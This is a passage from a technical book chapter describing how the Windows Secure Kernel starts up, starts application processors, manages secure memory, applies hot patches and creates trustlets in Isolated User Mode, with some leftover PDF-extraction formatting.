only solution compatible with HVCI. (New systems, as stated before, never map any UEFI firmware code
in VTL 1.) At startup time, the NT Hal detects that HVCI is on and that the firmware is entirely mapped
in VTL 1. So, it switches its internal EFI service table’s pointer to a new table, called UEFI wrapper table.
Entries of the wrapper table contain stub routines that use the INVOKE_EFI_RUNTIME_SERVICE secure
call to enter in VTL 1. The Secure Kernel marshals the parameters, executes the firmware call, and yields
the results to VTL 0. In this case, all the physical memory that describes the entire UEFI firmware is still
360
CHAPTER 9 Virtualization technologies
mapped in read-only mode in VTL 0. The goal is to allow drivers to correctly read information from the
UEFI firmware memory region (like ACPI tables, for example). Old drivers that directly write into UEFI
memory regions are not compatible with HVCI in this scenario.
When the Secure Kernel resumes from hibernation, it updates the in-memory UEFI service table
to point to the new services’ location. Furthermore, in systems that have the new UEFI firmware, the
Secure Kernel reapplies the SLAT protection on each memory region mapped in VTL 0 (the Windows
Loader is able to change the regions’ virtual addresses if needed).
VSM startup
Although we describe the entire Windows startup and shutdown mechanism in Chapter 12, this sec-
tion describes the way in which the Secure Kernel and all the VSM infrastructure is started. The Secure
Kernel is dependent on the hypervisor, the Windows Loader, and the NT kernel to properly start up.
We discuss the Windows Loader, the hypervisor loader, and the preliminary phases by which the Secure
Kernel is initialized in VTL 0 by these two modules in Chapter 12. In this section, we focus on the VSM
startup method, which is implemented in the securekernel.exe binary.
The first code executed by the securekernel.exe binary is still running in VTL 0; the hypervisor already
has been started, and the page tables used for VTL 1 have been built. The Secure Kernel initializes the
following components in VTL 0:
I
The memory manager’s initialization function stores the PFN of the VTL 0 root-level page-
level structure, saves the code integrity data, and enables HVCI, MBEC (Mode-Based Execution
Control), kernel CFG, and hot patching.
I
Shared architecture-specific CPU components, like the GDT and IDT.
I
Normal calls and secure system calls dispatch tables (initialization and compaction).
I
The boot processor. The process of starting the boot processor requires the Secure Kernel to
allocate its kernel and interrupt stacks; initialize the architecture-specific components, which
can’t be shared between different processors (like the TSS); and finally allocate the processor’s
SKPRCB. The latter is an important data structure, which, like the PRCB data structure in VTL 0, is
used to store important information associated to each CPU.
The Secure Kernel initialization code is ready to enter VTL 1 for the first time. The hypervisor subsystem
initialization function (ShvlInitSystem routine) connects to the hypervisor (through the hypervisor CPUID
classes; see the previous section for more details) and checks the supported enlightenments. Then it saves
the VTL 1’s page table (previously created by the Windows Loader) and the allocated hypercall pages
(used for holding hypercall parameters). It finally initializes and enters VTL 1 in the following way:
1.
Enables VTL 1 for the current hypervisor partition through the HvEnablePartitionVtl hypercall.
The hypervisor copies the existing SLAT table of normal VTL to VTL 1 and enables MBEC and
the new VTL 1 for the partition.
2.
Enables VTL 1 for the boot processor through HvEnableVpVtl hypercall. The hypervisor initial-
izes a new per-level VMCS data structure, compiles it, and sets the SLAT table.
CHAPTER 9 Virtualization technologies
361
3.
Asks the hypervisor for the location of the platform-dependent VtlCall and VtlReturn hypercall
code. The CPU opcodes needed for performing VSM calls are hidden from the Secure Kernel
implementation. This allows most of the Secure Kernel’s code to be platform-independent.
Finally, the Secure Kernel executes the transition to VTL 1, through the HvVtlCall hypercall. The
hypervisor loads the VMCS for the new VTL and switches to it (making it active). This basically
renders the new VTL runnable.
The Secure Kernel starts a complex initialization procedure in VTL 1, which still depends on the
Windows Loader and also on the NT kernel. It is worth noting that, at this stage, VTL 1 memory is still
identity-mapped in VTL 0; the Secure Kernel and its dependent modules are still accessible to the nor-
mal world. After the switch to VTL 1, the Secure Kernel initializes the boot processor:
1.
Gets the virtual address of the Synthetic Interrupt controller shared page, TSC, and VP assist
page, which are provided by the hypervisor for sharing data between the hypervisor and VTL 1
code. Maps in VTL 1 the Hypercall page.
2.
Blocks the possibility for other system virtual processors to be started by a lower VTL and
requests the memory to be zero-filled on reboot to the hypervisor.
3.
Initializes and fills the boot processor Interrupt Descriptor Table (IDT). Configures the IPI,
callbacks, and secure timer interrupt handlers and sets the current secure thread as the default
SKPRCB thread.
4.
Starts the VTL 1 secure memory manager, which creates the boot table mapping and maps the
boot loader’s memory in VTL 1, creates the secure PFN database and system hyperspace, initial-
izes the secure memory pool support, and reads the VTL 0 loader block to copy the module
descriptors of the Secure Kernel’s imported images (Skci.dll, Cnf.sys, and Vmsvcext.sys). It finally
walks the NT loaded module list to establish each driver state, creating a NAR (normal address
range) data structure for each one and compiling an Normal Table Entry (NTE) for every page
composing the boot driver’s sections. Furthermore, the secure memory manager initialization
function applies the correct VTL 0 SLAT protection to each driver’s sections.
5.
Initializes the HAL, the secure threads pool, the process subsystem, the synthetic APIC, Secure
PNP, and Secure PCI.
6.
Applies a read-only VTL 0 SLAT protection for the Secure Kernel pages, configures MBEC, and
enables the VINA virtual interrupt on the boot processor.
When this part of the initialization ends, the Secure Kernel unmaps the boot-loaded memory. The
secure memory manager, as we discuss in the next section, depends on the VTL 0 memory manager for
being able to allocate and free VTL 1 memory. VTL 1 does not own any physical memory; at this stage,
it relies on some previously allocated (by the Windows Loader) physical pages for being able to satisfy
memory allocation requests. When the NT kernel later starts, the Secure Kernel performs normal calls for
requesting memory services to the VTL 0 memory manager. As a result, some parts of the Secure Kernel
initialization must be deferred after the NT kernel is started. Execution flow returns to the Windows
Loader in VTL 0. The latter loads and starts the NT kernel. The last part of the Secure Kernel initializa-
tion happens in phase 0 and phase 1 of the NT kernel initialization (see Chapter 12 for further details).
362
CHAPTER 9 Virtualization technologies
Phase 0 of the NT kernel initialization still has no memory services available, but this is the last
moment in which the Secure Kernel fully trusts the normal world. Boot-loaded drivers still have not
been initialized and the initial boot process should have been already protected by Secure Boot. The
PHASE3_INIT secure call handler modifies the SLAT protections of all the physical pages belonging
to Secure Kernel and to its depended modules, rendering them inaccessible to VTL 0. Furthermore, it
applies a read-only protection to the kernel CFG bitmaps. At this stage, the Secure Kernel enables the
support for pagefile integrity, creates the initial system process and its address space, and saves all the
“trusted” values of the shared CPU registers (like IDT, GDT, Syscall MSR, and so on). The data structures
that the shared registers point to are verified (thanks to the NTE database). Finally, the secure thread
pool is started and the object manager, the secure code integrity module (Skci.dll), and HyperGuard
are initialized (more details on HyperGuard are available in Chapter 7 of Part 1).
When the execution flow is returned to VTL 0, the NT kernel can then start all the other application
processors (APs). When the Secure Kernel is enabled, the AP’s initialization happens in a slightly differ-
ent way (we discuss AP initialization in the next section).
As part of the phase 1 of the NT kernel initialization, the system starts the I/O manager. The I/O man-
ager, as discussed in Part 1, Chapter 6, “I/O system,” is the core of the I/O system and defines the model
within which I/O requests are delivered to device drivers. One of the duties of the I/O manager is to initial-
ize and start the boot-loaded and ELAM drivers. Before creating the special sections for mapping the
user mode system DLLs, the I/O manager initialization function emits a PHASE4_INIT secure call to start
the last initialization phase of the Secure Kernel. At this stage, the Secure Kernel does not trust the VTL 0
anymore, but it can use the services provided by the NT memory manager. The Secure Kernel initializes
the content of the Secure User Shared data page (which is mapped both in VTL 1 user mode and kernel
mode) and finalizes the executive subsystem initialization. It reclaims any resources that were reserved
during the boot process, calls each of its own dependent module entry points (in particular, cng.sys and
vmsvcext.sys, which start before any normal boot drivers). It allocates the necessary resources for the
encryption of the hibernation, crash-dump, paging files, and memory-page integrity. It finally reads and
maps the API set schema file in VTL 1 memory. At this stage, VSM is completely initialized.
Application processors (APs) startup
One of the security features provided by the Secure Kernel is the startup of the application processors
(APs), which are the ones not used to boot up the system. When the system starts, the Intel and AMD
specifications of the x86 and AMD64 architectures define a precise algorithm that chooses the boot
strap processor (BSP) in multiprocessor systems. The boot processor always starts in 16-bit real mode
(where it’s able to access only 1 MB of physical memory) and usually executes the machine’s firmware
code (UEFI in most cases), which needs to be located at a specific physical memory location (the loca-
tion is called reset vector). The boot processor executes almost all of the initialization of the OS, hyper-
visor, and Secure Kernel. For starting other non-boot processors, the system needs to send a special IPI
(inter-processor interrupt) to the local APICs belonging to each processor. The startup IPI (SIPI) vector
contains the physical memory address of the processor start block, a block of code that includes the
instructions for performing the following basic operations:
1.
Load a GDT and switch from 16-bit real-mode to 32-bit protected mode (with no paging enabled).
CHAPTER 9 Virtualization technologies
363
2.
Set a basic page table, enable paging, and enter 64-bit long mode.
3.
Load the 64-bit IDT and GDT, set the proper processor registers, and jump to the OS startup
function (KiSystemStartup).
This process is vulnerable to malicious attacks. The processor startup code could be modified by
external entities while it is executing on the AP processor (the NT kernel has no control at this point).
In this case, all the security promises brought by VSM could be easily fooled. When the hypervisor
and the Secure Kernel are enabled, the application processors are still started by the NT kernel but
using the hypervisor.
KeStartAllProcessors, which is the function called by phase 1 of the NT kernel initialization (see
Chapter 12 for more details), with the goal of starting all the APs, builds a shared IDT and enumerates
all the available processors by consulting the Multiple APIC Description Table (MADT) ACPI table. For
each discovered processor, it allocates memory for the PRCB and all the private CPU data structures for
the kernel and DPC stack. If the VSM is enabled, it then starts the AP by sending a START_PROCESSOR
secure call to the Secure Kernel. The latter validates that all the data structures allocated and filled
for the new processor are valid, including the initial values of the processor registers and the startup
routine (KiSystemStartup) and ensures that the APs startups happen sequentially and only once per
processor. It then initializes the VTL 1 data structures needed for the new application processor (the
SKPRCB in particular). The PRCB thread, which is used for dispatching the Secure Calls in the context
of the new processor, is started, and the VTL 0 CPU data structures are protected by using the SLAT.
The Secure Kernel finally enables VTL 1 for the new application processor and starts it by using the
HvStartVirtualProcessor hypercall. The hypervisor starts the AP in a similar way described in the begin-
ning of this section (by sending the startup IPI). In this case, however, the AP starts its execution in the
hypervisor context, switches to 64-bit long mode execution, and returns to VTL 1.
The first function executed by the application processor resides in VTL 1. The Secure Kernel’s CPU
initialization routine maps the per-processor VP assist page and SynIC control page, configures MBEC,
and enables the VINA. It then returns to VTL 0 through the HvVtlReturn hypercall. The first routine exe-
cuted in VTL 0 is KiSystemStartup, which initializes the data structures needed by the NT kernel to man-
age the AP, initializes the HAL, and jumps to the idle loop (read more details in Chapter 12). The Secure
Call dispatch loop is initialized later by the normal NT kernel when the first secure call is executed.
An attacker in this case can’t modify the processor startup block or any initial value of the CPU’s
registers and data structures. With the described secure AP start-up, any modification would have been
detected by the Secure Kernel and the system bug checked to defeat any attack effort.
The Secure Kernel memory manager
The Secure Kernel memory manager heavily depends on the NT memory manager (and on the
Windows Loader memory manager for its startup code). Entirely describing the Secure Kernel memory
manager is outside the scope of this book. Here we discuss only the most important concepts and data
structures used by the Secure Kernel.
364
CHAPTER 9 Virtualization technologies
As mentioned in the previous section, the Secure Kernel memory manager initialization is divided
into three phases. In phase 1, the most important, the memory manager performs the following:
1.
Maps the boot loader firmware memory descriptor list in VTL 1, scans the list, and determines
the first physical page that it can use for allocating the memory needed for its initial startup
(this memory type is called SLAB). Maps the VTL 0’s page tables in a virtual address that is
located exactly 512 GB before the VTL 1’s page table. This allows the Secure Kernel to perform
a fast conversion between an NT virtual address and one from the Secure Kernel.
2.
Initializes the PTE range data structures. A PTE range contains a bitmap that describes each
chunk of allocated virtual address range and helps the Secure Kernel to allocate PTEs for its
own address space.
3.
Creates the Secure PFN database and initializes the Memory pool.
4.
Initializes the sparse NT address table. For each boot-loaded driver, it creates and fills a NAR,
verifies the integrity of the binary, fills the hot patch information, and, if HVCI is on, protects
each executable section of driver using the SLAT. It then cycles between each PTE of the
memory image and writes an NT Address Table Entry (NTE) in the NT address table.
5.
Initializes the page bundles.
The Secure Kernel keeps track of the memory that the normal NT kernel uses. The Secure Kernel
memory manager uses the NAR data structure for describing a kernel virtual address range that
contains executable code. The NAR contains some information of the range (such as its base address
and size) and a pointer to a SECURE_IMAGE data structure, which is used for describing runtime drivers
(in general, images verified using Secure HVCI, including user mode images used for trustlets) loaded
in VTL 0. Boot-loaded drivers do not use the SECURE_IMAGE data structure because they are treated
by the NT memory manager as private pages that contain executable code. The latter data structure
contains information regarding a loaded image in the NT kernel (which is verified by SKCI), like the ad-
dress of its entry point, a copy of its relocation tables (used also for dealing with Retpoline and Import
Optimization), the pointer to its shared prototype PTEs, hot-patch information, and a data structure
that specifies the authorized use of its memory pages. The SECURE_IMAGE data structure is very
important because it’s used by the Secure Kernel to track and verify the shared memory pages that
are used by runtime drivers.
For tracking VTL 0 kernel private pages, the Secure Kernel uses the NTE data structure. An NTE ex-
ists for every virtual page in the VTL 0 address space that requires supervision from the Secure Kernel;
it’s often used for private pages. An NTE tracks a VTL 0 virtual page’s PTE and stores the page state and
protection. When HVCI is enabled, the NTE table divides all the virtual pages between privileged and
non-privileged. A privileged page represents a memory page that the NT kernel is not able to touch on
its own because it’s protected through SLAT and usually corresponds to an executable page or to a kernel
CFG read-only page. A nonprivileged page represents all the other types of memory pages that the NT
kernel has full control over. The Secure Kernel uses invalid NTEs to represent nonprivileged pages. When
HVCI is off, all the private pages are nonprivileged (the NT kernel has full control of all its pages indeed).
In HVCI-enabled systems, the NT memory manager can’t modify any protected pages. Otherwise,
an EPT violation exception will raise in the hypervisor, resulting in a system crash. After those systems
CHAPTER 9 Virtualization technologies
365
complete their boot phase, the Secure Kernel has already processed all the nonexecutable physical
pages by SLAT-protecting them only for read and write access. In this scenario, new executable pages
can be allocated only if the target code has been verified by Secure HVCI.
When the system, an application, or the Plug and Play manager require the loading of a new run-
time driver, a complex procedure starts that involves the NT and the Secure Kernel memory manager,
summarized here:
1.
The NT memory manager creates a section object, allocates and fills a new Control area (more
details about the NT memory manager are available in Chapter 5 of Part 1), reads the first page
of the binary, and calls the Secure Kernel with the goal to create the relative secure image,
which describe the new loaded module.
2.
The Secure Kernel creates the SECURE_IMAGE data structure, parses all the sections of the
binary file, and fills the secure prototype PTEs array.
3.
The NT kernel reads the entire binary in nonexecutable shared memory (pointed by the
prototype PTEs of the control area). Calls the Secure Kernel, which, using Secure HVCI, cycles
between each section of the binary image and calculates the final image hash.
4.
If the calculated file hash matches the one stored in the digital signature, the NT memory walks
the entire image and for each page calls the Secure Kernel, which validates the page (each page
hash has been already calculated in the previous phase), applies the needed relocations (ASLR,
Retpoline, and Import Optimization), and applies the new SLAT protection, allowing the page
to be executable but not writable anymore.
5.
The Section object has been created. The NT memory manager needs to map the driver in its
address space. It calls the Secure Kernel for allocating the needed privileged PTEs for describ-
ing the driver’s virtual address range. The Secure Kernel creates the NAR data structure. It
then maps the physical pages of the driver, which have been previously verified, using the
MiMapSystemImage routine.
Note When a NARs is initialized for a runtime driver, part of the NTE table is filled for de-
scribing the new driver address space. The NTEs are not used for keeping track of a runtime
driver’s virtual address range (its virtual pages are shared and not private), so the relative
part of the NT address table is filled with invalid “reserved” NTEs.
While VTL 0 kernel virtual address ranges are represented using the NAR data structure, the Secure
Kernel uses secure VADs (virtual address descriptors) to track user-mode virtual addresses in VTL 1.
Secure VADs are created every time a new private virtual allocation is made, a binary image is mapped
in the address space of a trustlet (secure process), and when a VBS-enclave is created or a module is
mapped into its address space. A secure VAD is similar to the NT kernel VAD and contains a descriptor
of the VA range, a reference counter, some flags, and a pointer to the Secure section, which has been
created by SKCI. (The secure section pointer is set to 0 in case of secure VADs describing private virtual
allocations.) More details about Trustlets and VBS-based enclaves will be discussed later in this chapter.
366
CHAPTER 9 Virtualization technologies
Page identity and the secure PFN database
After a driver is loaded and mapped correctly into VTL 0 memory, the NT memory manager needs to
be able to manage its memory pages (for various reasons, like the paging out of a pageable driver’s
section, the creation of private pages, the application of private fixups, and so on; see Chapter 5 in
Part 1 for more details). Every time the NT memory manager operates on protected memory, it needs
the cooperation of the Secure Kernel. Two main kinds of secure services are offered to the NT memory
manager for operating with privileged memory: protected pages copy and protected pages removal.
A PAGE_IDENTITY data structure is the glue that allows the Secure Kernel to keep track of all the
different kinds of pages. The data structure is composed of two fields: an Address Context and a Virtual
Address. Every time the NT kernel calls the Secure Kernel for operating on privileged pages, it needs
to specify the physical page number along with a valid PAGE_IDENTITY data structure describing what
the physical page is used for. Through this data structure, the Secure Kernel can verify the requested
page usage and decide whether to allow the request.
Table 9-4 shows the PAGE_IDENTITY data structure (second and third columns), and all the types of
verification performed by the Secure Kernel on different memory pages:
I
If the Secure Kernel receives a request to copy or to release a shared executable page of a
runtime driver, it validates the secure image handle (specified by the caller) and gets its relative
data structure (SECURE_IMAGE). It then uses the relative virtual address (RVA) as an index into
the secure prototype array to obtain the physical page frame (PFN) of the driver’s shared page.
If the found PFN is equal to the caller’s specified one, the Secure Kernel allows the request;
otherwise it blocks it.
I
In a similar way, if the NT kernel requests to operate on a trustlet or an enclave page (more
details about trustlets and secure enclaves are provided later in this chapter), the Secure Kernel
uses the caller’s specified virtual address to verify that the secure PTE in the secure process page
table contains the correct PFN.
I
As introduced earlier in the section ”The Secure Kernel memory manager” , for private kernel
pages, the Secure Kernel locates the NTE starting from the caller’s specified virtual address and
verifies that it contains a valid PFN, which must be the same as the caller’s specified one.
I
Placeholder pages are free pages that are SLAT protected. The Secure Kernel verifies the state of
a placeholder page by using the PFN database.
TABLE 9-4 Different page identities managed by the Secure Kernel
Page Type
Address Context
Virtual Address
erification tructure
Kernel Shared
Secure Image Handle
RVA of the page
Secure Prototype PTE
Trustlet/Enclave
Secure Process Handle
Virtual Address of the Secure Process
Secure PTE
Kernel Private
0
Kernel Virtual Address of the page
NT address table entry (NTE)
Placeholder
0
0
PFN entry
CHAPTER 9 Virtualization technologies
367
The Secure Kernel memory manager maintains a PFN database to represent the state of each physi-
cal page. A PFN entry in the Secure Kernel is much smaller compared to its NT equivalent; it basically
contains the page state and the share counter. A physical page, from the Secure Kernel perspective, can
be in one of the following states: invalid, free, shared, I/O, secured, or image (secured NT private).
The secured state is used for physical pages that are private to the Secure Kernel (the NT kernel can
never claim them) or for physical pages that have been allocated by the NT kernel and later SLAT-
protected by the Secure Kernel for storing executable code verified by Secure HVCI. Only secured
nonprivate physical pages have a page identity.
When the NT kernel is going to page out a protected page, it asks the Secure Kernel for a page remov-
al operation. The Secure Kernel analyzes the specified page identity and does its verification (as explained
earlier). In case the page identity refers to an enclave or a trustlet page, the Secure Kernel encrypts the
page’s content before releasing it to the NT kernel, which will then store the page in the paging file. In this
way, the NT kernel still has no chance to intercept the real content of the private memory.
Secure memory allocation
As discussed in previous sections, when the Secure Kernel initially starts, it parses the firmware’s mem-
ory descriptor lists, with the goal of being able to allocate physical memory for its own use. In phase
1 of its initialization, the Secure Kernel can’t use the memory services provided by the NT kernel (the
NT kernel indeed is still not initialized), so it uses free entries of the firmware’s memory descriptor lists
for reserving 2-MB SLABs. A SLAB is a 2-MB contiguous physical memory, which is mapped by a single
nested page table directory entry in the hypervisor. All the SLAB pages have the same SLAT protec-
tion. SLABs have been designed for performance considerations. By mapping a 2-MB chunk of physical
memory using a single nested page entry in the hypervisor, the additional hardware memory address
translation is faster and results in less cache misses on the SLAT table.
The first Secure Kernel page bundle is filled with 1 MB of the allocated SLAB memory. A page bundle
is the data structure shown in Figure 9-37, which contains a list of contiguous free physical page frame
numbers (PFNs). When the Secure Kernel needs memory for its own purposes, it allocates physical
pages from a page bundle by removing one or more free page frames from the tail of the bundle’s
PFNs array. In this case, the Secure Kernel doesn’t need to check the firmware memory descriptors list
until the bundle has been entirely consumed. When the phase 3 of the Secure Kernel initialization is
done, memory services of the NT kernel become available, and so the Secure Kernel frees any boot
memory descriptor lists, retaining physical memory pages previously located in bundles.
Future secure memory allocations use normal calls provided by the NT kernel. Page bundles have
been designed to minimize the number of normal calls needed for memory allocation. When a bundle
gets fully allocated, it contains no pages (all its pages are currently assigned), and a new one will be
generated by asking the NT kernel for 1 MB of contiguous physical pages (through the ALLOC_PHYSICAL
_PAGES normal call). The physical memory will be allocated by the NT kernel from the proper SLAB.
368
CHAPTER 9 Virtualization technologies
In the same way, every time the Secure Kernel frees some of its private memory, it stores the cor-
responding physical pages in the correct bundle by growing its PFN array until the limit of 256 free
pages. When the array is entirely filled, and the bundle becomes free, a new work item is queued. The
work item will zero-out all the pages and will emit a FREE_PHYSICAL_PAGES normal call, which ends up
in executing the MmFreePagesFromMdl function of the NT memory manager.
Every time enough pages are moved into and out of a bundle, they are fully protected in VTL 0 by
using the SLAT (this procedure is called “securing the bundle”). The Secure Kernel supports three kinds
of bundles, which all allocate memory from different SLABs: No access, Read-only, and Read-Execute.
Valid
Bundle Page
Invalid
NumberOfPages: 80
Next Bundle PFN: 0x4560
Flags: 0
PTE Entries
Page Bundle
Header
Entry 1: PFN 0x3590
Entry 2: PFN 0xA8F01
Entry 3: PFN 0x80D4
…
Entry 79: PFN 0x5012
Entry 80: Invalid (in use)
…
Entry 255: Invalid (in use)
PFN Array
FIGURE 9-37 A secure page bundle with 80 available pages. A bundle is composed of a
header and a free PFNs array.
Hot patching
Several years ago, the 32-bit versions of Windows were supporting the hot patch of the operating-
system’s components. Patchable functions contained a redundant 2-byte opcode in their prolog and
some padding bytes located before the function itself. This allowed the NT kernel to dynamically
replace the initial opcode with an indirect jump, which uses the free space provided by the padding, to
divert the code to a patched function residing in a different module. The feature was heavily used by
Windows Update, which allowed the system to be updated without the need for an immediate reboot
of the machine. When moving to 64-bit architectures, this was no longer possible due to various
problems. Kernel patch protection was a good example; there was no longer a reliable way to modify
a protected kernel mode binary and to allow PatchGuard to be updated without exposing some of its
private interfaces, and exposed PatchGuard interfaces could have been easily exploited by an attacker
with the goal to defeat the protection.
CHAPTER 9 Virtualization technologies
369
The Secure Kernel has solved all the problems related to 64-bit architectures and has reintroduced
to the OS the ability of hot patching kernel binaries. While the Secure Kernel is enabled, the following
types of executable images can be hot patched:
I
VTL 0 user-mode modules (both executables and libraries)
I
Kernel mode drivers, HAL, and the NT kernel binary, protected or not by PatchGuard
I
The Secure Kernel binary and its dependent modules, which run in VTL 1 Kernel mode
I
The hypervisor (Intel, AMD, and the ARM version).
Patch binaries created for targeting software running in VTL 0 are called normal patches, whereas
the others are called secure patches. If the Secure Kernel is not enabled, only user mode applications
can be patched.
A hot patch image is a standard Portable Executable (PE) binary that includes the hot patch table, the
data structure used for tracking the patch functions. The hot patch table is linked in the binary through
the image load configuration data directory. It contains one or more descriptors that describe each
patchable base image, which is identified by its checksum and time date stamp. (In this way, a hot patch
is compatible only with the correct base images. The system can’t apply a patch to the wrong image.) The
hot patch table also includes a list of functions or global data chunks that needs to be updated in the base
or in the patch image; we describe the patch engine shortly. Every entry in this list contains the functions’
offsets in the base and patch images and the original bytes of the base function that will be replaced.
Multiple patches can be applied to a base image, but the patch application is idempotent. The same
patch may be applied multiple times, or different patches may be applied in sequence. Regardless, the
last applied patch will be the active patch for the base image. When the system needs to apply a hot
patch, it uses the NtManageHotPatch system call, which is employed to install, remove, or manage hot
patches. (The system call supports different “patch information” classes for describing all the possible
operations.) A hot patch can be installed globally for the entire system, or, if a patch is for user mode
code (VTL 0), for all the processes that belong to a specific user session.
When the system requests the application of a patch, the NT kernel locates the hot patch table in
the patch binary and validates it. It then uses the DETERMINE_HOT_PATCH_TYPE secure call to securely
determine the type of patch. In the case of a secure patch, only the Secure Kernel can apply it, so the
APPLY_HOT_PATCH secure call is used; no other processing by the NT kernel is needed. In all the other
cases, the NT kernel first tries to apply the patch to a kernel driver. It cycles between each loaded kernel
module, searching for a base image that has the same checksum described by one of the patch image’s
hot patch descriptors.
Hot patching is enabled only if the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Session Manager\Memory Management\HotPatchTableSize registry value is a multiple of a standard
memory page size (4,096). Indeed, when hot patching is enabled, every image that is mapped in the
virtual address space needs to have a certain amount of virtual address space reserved immediately
after the image itself. This reserved space is used for the image’s hot patch address table (HPAT, not to
be confused with the hot patch table). The HPAT is used to minimize the amount of padding neces-
sary for each function to be patched by storing the address of the new function in the patched image.
370
CHAPTER 9 Virtualization technologies
When patching a function, the HPAT location will be used to perform an indirect jump from the original
function in the base image to the patched function in the patch image (note that for Retpoline compat-
ibility, another kind of Retpoline routine is used instead of an indirect jump).
When the NT kernel finds a kernel mode driver suitable for the patch, it loads and maps the patch
binary in the kernel address space and creates the related loader data table entry (for more details,
see Chapter 12). It then scans each memory page of both the base and the patch images and locks in
memory the ones involved in the hot patch (this is important; in this way, the pages can’t be paged out
to disk while the patch application is in progress). It finally emits the APPLY_HOT_PATCH secure call.
The real patch application process starts in the Secure Kernel. The latter captures and verifies the hot
patch table of the patch image (by remapping the patch image also in VTL 1) and locates the base im-
age’s NAR (see the previous section, “The Secure Kernel memory manager” for more details about the
NARs), which also tells the Secure Kernel whether the image is protected by PatchGuard. The Secure
Kernel then verifies whether enough reserved space is available in the image HPAT. If so, it allocates
one or more free physical pages (getting them from the secure bundle or using the ALLOC_PHYSICAL_
PAGES normal call) that will be mapped in the reserved space. At this point, if the base image is pro-
tected, the Secure Kernel starts a complex process that updates the PatchGuard’s internal state for the
new patched image and finally calls the patch engine.
The kernel's patch engine performs the following high-level operations, which are all described by a
different entry type in the hot patch table:
1.
Patches all calls from patched functions in the patch image with the goal to jump to the cor-
responding functions in the base image. This ensures that all unpatched code always executes
in the original base image. For example, if function A calls B in the base image and the patch
changes function A but not function B, then the patch engine will update function B in the
patch to jump to function B in the base image.
2.
Patches the necessary references to global variables in patched functions to point to the cor-
responding global variables in the base image.
3.
Patches the necessary import address table (IAT) references in the patch image by copying the
corresponding IAT entries from the base image.
4.
Atomically patches the necessary functions in the base image to jump to the corresponding func-
tion in the patch image. As soon as this is done for a given function in the base image, all new in-
vocations of that function will execute the new patched function code in the patch image. When
the patched function returns, it will return to the caller of the original function in the base image.
Since the pointers of the new functions are 64 bits (8 bytes) wide, the patch engine inserts each
pointer in the HPAT, which is located at the end of the binary. In this way, it needs only 5 bytes for plac-
ing the indirect jump in the padding space located in the beginning of each function (the process has
been simplified. Retpoline compatible hot-patches requires a compatible Retpoline. Furthermore, the
HPAT is split in code and data page).
As shown in Figure 9-38, the patch engine is compatible with different kinds of binaries. If the NT
kernel has not found any patchable kernel mode module, it restarts the search through all the user
CHAPTER 9 Virtualization technologies
371
mode processes and applies a procedure similar to properly hot patching a compatible user mode
executable or library.
• Load patch binary
• Point patched functions to patch binary
atomically
• Unpatched code always executes in
original binary
VTL0
VTL1
User
Kerner
DriverA.sys
DriverA-
Patch1.sys
Foo.dll
Ntoskrnl.exe
Ntoskrnl-
Patch1.exe
Foo-
Patch1.dll
Process 1
Foo.dll
Foo-
Patch1.dll
Process 2
SecureKernel.
exe
SecureKernel-
Patch1.exe
Foo.dll
Foo-
Patch1.dll
Process 3
DriverA-
Patch2.sys
DriverB.sys
DriverB-
Patch1.sys
FIGURE 9-38 A schema of the hot patch engine executing on different types of binaries.
Isolated User Mode
Isolated User Mode (IUM), the services provided by the Secure Kernel to its secure processes (trustlets),
and the trustlets general architecture are covered in Chapter 3 of Part 1. In this section, we continue
the discussion starting from there, and we move on to describe some services provided by the Isolated
User Mode, like the secure devices and the VBS enclaves.
As introduced in Chapter 3 of Part 1, when a trustlet is created in VTL 1, it usually maps in its address
space the following libraries:
I
Iumdll.dll The IUM Native Layer DLL implements the secure system call stub. It’s the equiva-
lent of Ntdll.dll of VTL 0.
I
Iumbase.dll The IUM Base Layer DLL is the library that implements most of the secure APIs
that can be consumed exclusively by VTL 1 software. It provides various services to each secure
process, like secure identification, communication, cryptography, and secure memory manage-
ment. Trustlets do not usually call secure system calls directly, but they pass through Iumbase.
dll, which is the equivalent of kernelbase.dll in VTL 0.
I
IumCrypt.dll Exposes public/private key encryption functions used for signing and integrity
verification. Most of the crypto functions exposed to VTL 1 are implemented in Iumbase.dll; only a
small number of specialized encryption routines are implemented in IumCrypt. LsaIso is the main
consumer of the services exposed by IumCrypt, which is not loaded in many other trustlets.
I
Ntdll.dll, Kernelbase.dll, and Kernel32.dll A trustlet can be designed to run both in VTL
1 and VTL 0. In that case, it should only use routines implemented in the standard VTL 0 API
surface. Not all the services available to VTL 0 are also implemented in VTL 1. For example, a
trustlet can never do any registry I/O and any file I/O, but it can use synchronization routines,
ALPC, thread APIs, and structured exception handling, and it can manage virtual memory and
372
CHAPTER 9 Virtualization technologies
section objects. Almost all the services offered by the kernelbase and kernel32 libraries perform
system calls through Ntdll.dll. In VTL 1, these kinds of system calls are “translated” in normal
calls and redirected to the VTL 0 kernel. (We discussed normal calls in detail earlier in this chap-
ter.) Normal calls are often used by IUM functions and by the Secure Kernel itself. This explains
why ntdll.dll is always mapped in every trustlet.
I
Vertdll.dll The VSM enclave runtime DLL is the DLL that manages the lifetime of a VBS en-
clave. Only limited services are provided by software executing in a secure enclave. This library
implements all the enclave services exposed to the software enclave and is normally not loaded
for standard VTL 1 processes.
With this knowledge in mind, let’s look at what is involved in the trustlet creation process, starting
from the CreateProcess API in VTL 0, for which its execution flow has already been described in detail
in Chapter 3.
Trustlets creation
As discussed multiple times in the previous sections, the Secure Kernel depends on the NT kernel for per-
forming various operations. Creating a trustlet follows the same rule: It is an operation that is managed
by both the Secure Kernel and NT kernel. In Chapter 3 of Part 1, we presented the trustlet structure and
its signing requirement, and we described its important policy metadata. Furthermore, we described the
detailed flow of the CreateProcess API, which is still the starting point for the trustlet creation.
To properly create a trustlet, an application should specify the CREATE_SECURE_PROCESS creation flag
when calling the CreateProcess API. Internally, the flag is converted to the PS_CP_SECURE_ PROCESS
NT attribute and passed to the NtCreateUserProcess native API. After the NtCreateUserProcess has
successfully opened the image to be executed, it creates the section object of the image by specifying
a special flag, which instructs the memory manager to use the Secure HVCI to validate its content. This
allows the Secure Kernel to create the SECURE_IMAGE data structure used to describe the PE image
verified through Secure HVCI.
The NT kernel creates the required process’s data structures and initial VTL 0 address space (page
directories, hyperspace, and working set) as for normal processes, and if the new process is a trustlet, it
emits a CREATE_PROCESS secure call. The Secure Kernel manages the latter by creating the secure pro-
cess object and relative data structure (named SEPROCESS). The Secure Kernel links the normal process
object (EPROCESS) with the new secure one and creates the initial secure address space by allocating
the secure page table and duplicating the root entries that describe the kernel portion of the secure
address space in the upper half of it.
The NT kernel concludes the setup of the empty process address space and maps the Ntdll library
